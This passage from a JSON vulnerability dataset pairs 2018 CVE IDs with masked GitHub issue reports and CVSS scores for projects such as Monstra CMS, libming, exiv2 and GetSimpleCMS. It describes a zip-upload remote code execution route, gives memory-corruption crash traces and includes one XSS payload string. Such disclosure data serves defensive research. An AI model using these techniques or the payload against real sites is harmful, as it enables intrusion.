  32995. },
  32996. {
  32997. "CVE_ID": "CVE-2018-9037",
  32998. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/433",
  32999. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/433",
  33000. "Repo_new": "monstra-cms/monstra",
  33001. "Issue_Created_At": "2018-03-28T10:45:33Z",
  33002. "description": "a remote code execution vulnerability. Hi, I have found a remote code execution vulnerability. Affected Version NUMBERTAG or before Monstra CMS NUMBERTAG allows remote code execution via an upload_file request for a .zip file which is automatically extracted and may contain .php files. Payload: FILETAG FILETAG The archive is extracted directly without any check on its contents, so an attacker can build a zip plugin that contains a .php file able to execute commands. FILETAG Testing Environment: os: mac PHP NUMBERTAG Mitigation: Validate plugin archives before extracting them, in particular rejecting entries with executable extensions such as .php, rather than trusting the archive contents.",
  33003. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  33004. "severity": "HIGH",
  33005. "baseScore": 8.8,
  33006. "impactScore": 5.9,
  33007. "exploitabilityScore": 2.8
  33008. },
  33009. {
  33010. "CVE_ID": "CVE-2018-9038",
  33011. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/434",
  33012. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/434",
  33013. "Repo_new": "monstra-cms/monstra",
  33014. "Issue_Created_At": "2018-03-28T10:57:11Z",
  33015. "description": "Insecure Permissions Vulnerability. Hi, I found another vulnerability. Affected Version NUMBERTAG or before payload FILETAG Steps to replicate: Please see attachment FILETAG Impacts: Monstra CMS NUMBERTAG allows remote attackers to delete files via an PATHTAG request.",
  33016. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  33017. "severity": "MEDIUM",
  33018. "baseScore": 6.5,
  33019. "impactScore": 3.6,
  33020. "exploitabilityScore": 2.8
  33021. },
  33022. {
  33023. "CVE_ID": "CVE-2018-9039",
  33024. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4407",
  33025. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4407",
  33026. "Repo_new": "octopusdeploy/issues",
  33027. "Issue_Created_At": "2018-03-20T23:28:57Z",
  33028. "description": "Deployment Targets visible when scoping APITAG Variable sets for logged in Users whose Team is not scoped to the required Environments. Octopus Version: Tested and replicated in Octopus Version NUMBERTAG Issue: When scoping Project or Library Variables it's possible to specify specific Deployment Targets. In this instance, however, Users are able to view deployment targets and create associated Variables despite the logged in Users Team not being scoped to the appropriate environment. Replication Steps NUMBERTAG Create a new Octopus user with appropriate permissions to edit/view APITAG variable sets NUMBERTAG Create a Team that is scoped to a specific environment (in this example the Testing environment), see below; FILETAG In this example, the Testing environment contains only two deployment targets Offline Package Target and Testing FILETAG NUMBERTAG Login to Octopus as the created User NUMBERTAG Navigate to either the Variables within a Project or Library Set (In this example, this is demonstrating via the Project Variables) and create a new variable, when scoping this variable to a specific target, all targets are viewable not just the two belonging to the associated Team. FILETAG It is then possible to save this change as shown below; FILETAG Source: URLTAG",
  33029. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  33030. "severity": "MEDIUM",
  33031. "baseScore": 6.5,
  33032. "impactScore": 3.6,
  33033. "exploitabilityScore": 2.8
  33034. },
  33035. {
  33036. "CVE_ID": "CVE-2018-9055",
  33037. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/172",
  33038. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/172",
  33039. "Repo_new": "jasper-software/jasper",
  33040. "Issue_Created_At": "2018-03-27T02:31:54Z",
  33041. "description": "Reachable assertions in jpc_firstone. Description of problem: There is a reachable assertion abort in function jpc_firstone of APITAG that will lead to a remote denial of service attack. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below: ERRORTAG jpc_firstone in jpc_math.c CODETAG Additional info: Credits: pwd MENTIONTAG poc URLTAG",
  33042. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33043. "severity": "MEDIUM",
  33044. "baseScore": 5.5,
  33045. "impactScore": 3.6,
  33046. "exploitabilityScore": 1.8
  33047. },
  33048. {
  33049. "CVE_ID": "CVE-2018-9132",
  33050. "Issue_Url_old": "https://github.com/libming/libming/issues/133",
  33051. "Issue_Url_new": "https://github.com/libming/libming/issues/133",
  33052. "Repo_new": "libming/libming",
  33053. "Issue_Created_At": "2018-03-29T14:59:42Z",
  33054. "description": "Null pointer dereference in APITAG (decompile.c). On latest version of libming and commit APITAG there is a null pointer dereference in APITAG function of decompile.c file, which could be triggered by the POC below. To reproduce the issue, run ./swftophp $POC The POC is attached NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffca3ae5e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG bc2c NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG PATHTAG ERRORTAG NUMBERTAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG NUMBERTAG ABORTING FILETAG",
  33055. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33056. "severity": "MEDIUM",
  33057. "baseScore": 6.5,
  33058. "impactScore": 3.6,
  33059. "exploitabilityScore": 2.8
  33060. },
  33061. {
  33062. "CVE_ID": "CVE-2018-9135",
  33063. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1009",
  33064. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1009",
  33065. "Repo_new": "imagemagick/imagemagick",
  33066. "Issue_Created_At": "2018-03-02T06:16:43Z",
  33067. "description": "heap buffer overflow . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  33068. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33069. "severity": "HIGH",
  33070. "baseScore": 8.8,
  33071. "impactScore": 5.9,
  33072. "exploitabilityScore": 2.8
  33073. },
  33074. {
  33075. "CVE_ID": "CVE-2018-9144",
  33076. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/254",
  33077. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/254",
  33078. "Repo_new": "exiv2/exiv2",
  33079. "Issue_Created_At": "2018-03-29T01:30:57Z",
  33080. "description": "Two out of bound read when read tiff file. out of bound read in function APITAG and APITAG the result info with valgrind as follows: the first one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b5ba2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: 
APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the second one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FE8: APITAG char const , unsigned long, unsigned long) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG C: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG 
APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b5 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B4B9: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2C2BC: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::char_traits APITAG , std::allocator APITAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7BB: APITAG short, unsigned short) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG 
NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack 
NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the pocs please refer to : URLTAG URLTAG",
  33081. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  33082. "severity": "HIGH",
  33083. "baseScore": 8.1,
  33084. "impactScore": 5.2,
  33085. "exploitabilityScore": 2.8
  33086. },
  33087. {
  33088. "CVE_ID": "CVE-2018-9159",
  33089. "Issue_Url_old": "https://github.com/perwendel/spark/issues/981",
  33090. "Issue_Url_new": "https://github.com/perwendel/spark/issues/981",
  33091. "Repo_new": "perwendel/spark",
  33092. "Issue_Created_At": "2018-02-25T05:25:55Z",
  33093. "description": "Where Can I Report Security Vulnerability?. HI, I found a vulnerability and followed the steps URLTAG , and sent mail to people on this page URLTAG . But it seems one of these mail addresses does not exist and there has been no reply for NUMBERTAG days. Could you check the mail box? Thanks!",
  33094. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33095. "severity": "MEDIUM",
  33096. "baseScore": 5.3,
  33097. "impactScore": 1.4,
  33098. "exploitabilityScore": 3.9
  33099. },
  33100. {
  33101. "CVE_ID": "CVE-2018-9165",
  33102. "Issue_Url_old": "https://github.com/libming/libming/issues/121",
  33103. "Issue_Url_new": "https://github.com/libming/libming/issues/121",
  33104. "Repo_new": "libming/libming",
  33105. "Issue_Created_At": "2018-03-09T06:35:17Z",
  33106. "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ./swftoc NUMBERTAG NULL ptr swf /dev/null .... ... ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f9aac0d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d6c3d0 sp NUMBERTAG ffe NUMBERTAG d6bb NUMBERTAG T NUMBERTAG f9aac0d NUMBERTAG in strlen ( PATHTAG NUMBERTAG f9aaccab1a5 in __interceptor_strlen ( PATHTAG NUMBERTAG fd in APITAG PATHTAG NUMBERTAG d NUMBERTAG b in APITAG PATHTAG NUMBERTAG e7ea in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG c6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG f9aac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG strlen NUMBERTAG ABORTING POC FILE\uff1a URLTAG",
  33107. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33108. "severity": "MEDIUM",
  33109. "baseScore": 6.5,
  33110. "impactScore": 3.6,
  33111. "exploitabilityScore": 2.8
  33112. },
  33113. {
  33114. "CVE_ID": "CVE-2018-9173",
  33115. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1266",
  33116. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1266",
  33117. "Repo_new": "getsimplecms/getsimplecms",
  33118. "Issue_Created_At": "2018-03-31T12:07:50Z",
  33119. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG Open below URL in browser which supports flash. URLTAG \"])}catche(e){alert(\"xss\")}// Fix: Update uploadify version. Release Info NUMBERTAG",
  33120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33121. "severity": "MEDIUM",
  33122. "baseScore": 6.1,
  33123. "impactScore": 2.7,
  33124. "exploitabilityScore": 2.8
  33125. },
  33126. {
  33127. "CVE_ID": "CVE-2018-9252",
  33128. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/173",
  33129. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/173",
  33130. "Repo_new": "jasper-software/jasper",
  33131. "Issue_Created_At": "2018-04-03T02:09:01Z",
  33132. "description": "A reachable assertion abort in function jpc_abstorelstepsize. Description of problem: There is a reachable assertion abort in function jpc_abstorelstepsize of APITAG that will lead to remote denial of service attack. Version Release number of selected component (if applicable): APITAG , APITAG \"!((expn NUMBERTAG APITAG PATHTAG line=line APITAG APITAG APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG expn NUMBERTAG file NUMBERTAG ffff7b NUMBERTAG bf0 PATHTAG line NUMBERTAG function NUMBERTAG ffff7b NUMBERTAG c0 APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff7b4cc0d in jpc_abstorelstepsize (absdelta NUMBERTAG scaleexpn NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG e in jpc_enc_encodemainhdr (enc NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG ffff7b4cdb7 in jpc_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG fffffffc NUMBERTAG n_jp2overhead NUMBERTAG at PATHTAG NUMBERTAG ffff7b3a NUMBERTAG f in jp2_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG ffff7b1fc NUMBERTAG in jas_image_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG fmt NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG c in main (argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __libc_start_main (main NUMBERTAG c NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ba9 in _start () APITAG c static uint_fast NUMBERTAG t APITAG absdelta, int scaleexpn) { int p; uint_fast NUMBERTAG t mant; uint_fast NUMBERTAG t expn; int n; if (absdelta APITAG ( n)) : (absdelta << n NUMBERTAG ff; expn = scaleexpn p; if (scaleexpn < p) { APITAG } return JPC_QCX_EXPN(expn) | JPC_QCX_MANT(mant); } ` Additional info: Credits: pwd MENTIONTAG poc 
URLTAG",
  33133. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33134. "severity": "MEDIUM",
  33135. "baseScore": 6.5,
  33136. "impactScore": 3.6,
  33137. "exploitabilityScore": 2.8
  33138. },
  33139. {
  33140. "CVE_ID": "CVE-2018-9275",
  33141. "Issue_Url_old": "https://github.com/Yubico/yubico-pam/issues/136",
  33142. "Issue_Url_new": "https://github.com/yubico/yubico-pam/issues/136",
  33143. "Repo_new": "yubico/yubico-pam",
  33144. "Issue_Created_At": "2018-04-02T16:38:28Z",
  33145. "description": "Authfile Leaking File Descriptor . When the authfile is successfully opened, the file descriptor is not closed and leaks file descriptors. The file descriptor should be closed after this line; URLTAG APITAG",
  33146. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  33147. "severity": "HIGH",
  33148. "baseScore": 8.2,
  33149. "impactScore": 4.2,
  33150. "exploitabilityScore": 3.9
  33151. },
  33152. {
  33153. "CVE_ID": "CVE-2018-9304",
  33154. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/262",
  33155. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/262",
  33156. "Repo_new": "exiv2/exiv2",
  33157. "Issue_Created_At": "2018-04-04T08:08:31Z",
  33158. "description": "a div by zero in APITAG A divide by zero occurs in function APITAG the debug info as follows: [ registers ] RA NUMBERTAG ffffffffffffffff RB NUMBERTAG RC NUMBERTAG ffff NUMBERTAG aa3d NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RBP NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe2c NUMBERTAG fffffffe NUMBERTAG fffffffe3b NUMBERTAG RSP NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RIP NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e8]) R NUMBERTAG R NUMBERTAG ba NUMBERTAG R NUMBERTAG fffffffde NUMBERTAG R NUMBERTAG ffff NUMBERTAG a APITAG APITAG push rbp) R NUMBERTAG c6f8 APITAG const&)>: push rbp) R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG fb4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ebx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG fba APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG call NUMBERTAG ffff NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG fbf APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ed NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e NUMBERTAG ffff NUMBERTAG fcb APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG cmp rbx,ra NUMBERTAG ffff NUMBERTAG fce APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG seta al NUMBERTAG ffff NUMBERTAG fd1 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG test al,al NUMBERTAG ffff NUMBERTAG fd3 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG je NUMBERTAG ffff NUMBERTAG APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG stack NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG 
APITAG push rbp NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG b NUMBERTAG cd NUMBERTAG APITAG push rbp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG f NUMBERTAG ffff NUMBERTAG ad NUMBERTAG APITAG mov rax,QWORD PTR [rip NUMBERTAG c NUMBERTAG ffff NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffe0a NUMBERTAG ffffe0d NUMBERTAG fffffffe0a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGFPE NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG if (size > APITAG / count) gdb peda$ p count NUMBERTAG gdb peda$ bt NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG af6 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG os=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG ca2e in APITAG (this NUMBERTAG out=..., APITAG at APITAG NUMBERTAG c7f9 in APITAG (this NUMBERTAG path=\"crashes NUMBERTAG APITAG NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG 